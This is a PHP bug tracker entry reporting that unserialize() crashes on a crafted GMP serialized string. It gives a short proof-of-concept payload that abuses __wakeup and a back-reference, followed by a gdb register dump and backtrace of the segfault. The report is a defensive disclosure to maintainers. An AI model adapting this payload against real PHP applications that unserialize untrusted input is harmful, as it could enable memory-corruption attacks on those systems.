|
|
php.net | support | documentation | report a bug | advanced search | search howto | statistics | random bug | login |
PatchesPull RequestsHistoryAllCommentsChangesGit/SVN commits
[2016-09-23 16:59 UTC] ahihibughunter at gmail dot com
-Summary: Create an Unexpected Object when Deserialize GMP
object
+Summary: Crash with an Unexpected Object when Deserialize GMP
object
[2016-09-23 16:59 UTC] ahihibughunter at gmail dot com
[2017-01-16 13:32 UTC] nikic@php.net
-Status: Open
+Status: Duplicate
[2017-01-16 13:32 UTC] nikic@php.net
|
|||||||||||||||||||||||||||
Copyright © 2001-2025 The PHP GroupAll rights reserved. |
Last updated: Sat Apr 19 17:01:26 2025 UTC |
Description: ------------ #Similar with 72663 When php trying to deserialize an unexpected object via GMP, it will lead to crash. Test script: --------------- <?php class bug{ public function __wakeup(){ $this->bug=str_repeat('A', 0xff); } } $r='s:1:"0";a:1:{i:0;O:3:"bug":1:{s:3:"bug";R:2;}}'; $s='a:1:{i:0;C:3:"GMP":'.strlen($r).':{'.$r.'}}'; $x=unserialize($s); Expected result: ---------------- No crash Actual result: -------------- Program received signal SIGSEGV, Segmentation fault. [----------------------------------registers-----------------------------------] RAX: 0x803df5e8aa20 RBX: 0x10007fff730e --> 0xf4f4f400f1f1f1f1 RCX: 0x7ffff7f67820 --> 0x0 RDX: 0x1007bebd1545 RSI: 0xffffeff006b --> 0x0 RDI: 0x803df5e8aa28 RBP: 0x7fffffff9830 --> 0x7fffffff9980 --> 0x7fffffff9bc0 --> 0x7fffffff9d10 --> 0x7fffffff9f50 --> 0x7fffffffa0e0 (--> ...) RSP: 0x7fffffff9810 --> 0x7ffff7f7dd75 --> 0x29007d7d ('}}') RIP: 0xbd6bea (<zend_std_get_properties+121>: cmp BYTE PTR [rdx+0x7fff8000],0x0) R8 : 0x1 R9 : 0xa ('\n') R10: 0x778 R11: 0x1e R12: 0x7ffff7f7b2f0 --> 0x700000008 --> 0x0 R13: 0x7ffff7f7d890 --> 0x7ffff7f7c378 --> 0x41 ('A') R14: 0xffffffff30e --> 0x0 R15: 0x7ffff7f7d8b0 --> 0x1 EFLAGS: 0x10202 (carry parity adjust zero sign trap INTERRUPT direction overflow) [-------------------------------------code-------------------------------------] 0xbd6bdf <zend_std_get_properties+110>: lea rdi,[rax+0x8] 0xbd6be3 <zend_std_get_properties+114>: mov rdx,rdi 0xbd6be6 <zend_std_get_properties+117>: shr rdx,0x3 => 0xbd6bea <zend_std_get_properties+121>: cmp BYTE PTR [rdx+0x7fff8000],0x0 0xbd6bf1 <zend_std_get_properties+128>: je 0xbd6bf8 <zend_std_get_properties+135> 0xbd6bf3 <zend_std_get_properties+130>: call 0x4205e0 <__asan_report_load8@plt> 0xbd6bf8 <zend_std_get_properties+135>: mov rbx,QWORD PTR [rax+0x8] 0xbd6bfc <zend_std_get_properties+139>: lea r13,[rbx+0x8] [------------------------------------stack-------------------------------------] 0000| 0x7fffffff9810 --> 0x7ffff7f7dd75 --> 0x29007d7d ('}}') 0008| 0x7fffffff9818 --> 0x10007fff730e --> 0xf4f4f400f1f1f1f1 0016| 0x7fffffff9820 --> 0x7ffff7f7b2f0 --> 0x700000008 --> 0x0 0024| 0x7fffffff9828 --> 0x7ffff7f7d890 --> 0x7ffff7f7c378 --> 0x41 ('A') 0032| 0x7fffffff9830 --> 0x7fffffff9980 --> 0x7fffffff9bc0 --> 0x7fffffff9d10 --> 0x7fffffff9f50 --> 0x7fffffffa0e0 (--> ...) 0040| 0x7fffffff9838 --> 0x74e4b7 (<gmp_unserialize+1387>: mov r8d,0x8) 0048| 0x7fffffff9840 --> 0x178d330 --> 0x0 0056| 0x7fffffff9848 --> 0xffffffff38c --> 0x0 [------------------------------------------------------------------------------] Legend: code, data, rodata, value Stopped reason: SIGSEGV 0x0000000000bd6bea in zend_std_get_properties (object=<optimized out>) at /home/z/php5/Zend/zend_object_handlers.c:108 108 zobj = Z_OBJ_P(object); gdb-peda$ bt #0 0x0000000000bd6bea in zend_std_get_properties (object=<optimized out>) at /home/z/php5/Zend/zend_object_handlers.c:108 #1 0x000000000074e4b7 in gmp_unserialize (object=<optimized out>, ce=<optimized out>, buf=<optimized out>, buf_len=<optimized out>, data=<optimized out>) at /home/z/php5/ext/gmp/gmp.c:662 #2 0x0000000000a01e9f in object_custom (ce=0x603600005e00, var_hash=0x2e, max=0x2e <error: Cannot access memory at address 0x2e>, p=0x7fffffffa030, rval=0x2e) at /home/z/php5/ext/standard/var_unserializer.c:393 #3 php_var_unserialize (rval=rval@entry=0x7fffffff9c60, p=p@entry=0x7fffffffa030, max=max@entry=0x7ffff7f7dd77 "", var_hash=var_hash@entry=0x7fffffffa070) at /home/z/php5/ext/standard/var_unserializer.c:758 #4 0x0000000000a045d2 in process_nested_data (rval=rval@entry=0x7fffffff9f88, p=p@entry=0x7fffffffa030, max=max@entry=0x7ffff7f7dd77 "", var_hash=var_hash@entry=0x7fffffffa070, ht=<optimized out>, elements=0x0, elements@entry=0x1, objprops=<optimized out>, objprops@entry=0x0) at /home/z/php5/ext/standard/var_unserializer.c:324 #5 0x0000000000a02589 in php_var_unserialize (rval=rval@entry=0x7fffffff9f88, p=p@entry=0x7fffffffa030, max=<optimized out>, var_hash=var_hash@entry=0x7fffffffa070) at /home/z/php5/ext/standard/var_unserializer.c:842 #6 0x00000000009da822 in zif_unserialize (ht=<optimized out>, return_value=<optimized out>, return_value_ptr=<optimized out>, this_ptr=<optimized out>, return_value_used=<optimized out>) at /home/z/php5/ext/standard/var.c:964 #7 0x0000000000d616fc in zend_do_fcall_common_helper_SPEC (execute_data=execute_data@entry=0x7ffff7f479d8) at /home/z/php5/Zend/zend_vm_execute.h:558 #8 0x0000000000d630be in ZEND_DO_FCALL_SPEC_CONST_HANDLER (execute_data=0x7ffff7f479d8) at /home/z/php5/Zend/zend_vm_execute.h:2602 #9 0x0000000000c148ad in execute_ex (execute_data=execute_data@entry=0x7ffff7f479d8) at /home/z/php5/Zend/zend_vm_execute.h:363 #10 0x0000000000d5caaf in zend_execute (op_array=0x7ffff7f7adc0) at /home/z/php5/Zend/zend_vm_execute.h:388 #11 0x0000000000b67b3e in zend_execute_scripts (type=type@entry=0x8, retval=retval@entry=0x0, file_count=file_count@entry=0x3) at /home/z/php5/Zend/zend.c:1341 #12 0x0000000000a48876 in php_execute_script (primary_file=primary_file@entry=0x7fffffffcf20) at /home/z/php5/main/main.c:2613 #13 0x0000000000d6604e in do_cli (argc=argc@entry=0x2, argv=argv@entry=0x60060000ee90) at /home/z/php5/sapi/cli/php_cli.c:994 #14 0x0000000000d680d6 in main (argc=argc@entry=0x2, argv=0x60060000ee90, argv@entry=0x7fffffffe668) at /home/z/php5/sapi/cli/php_cli.c:1378 #15 0x00007ffff3da7f45 in __libc_start_main (main=0xd670a2 <main>, argc=0x2, argv=0x7fffffffe668, init=<optimized out>, fini=<optimized out>, rtld_fini=<optimized out>, stack_end=0x7fffffffe658) at libc-start.c:287 #16 0x00000000004226e9 in _start ()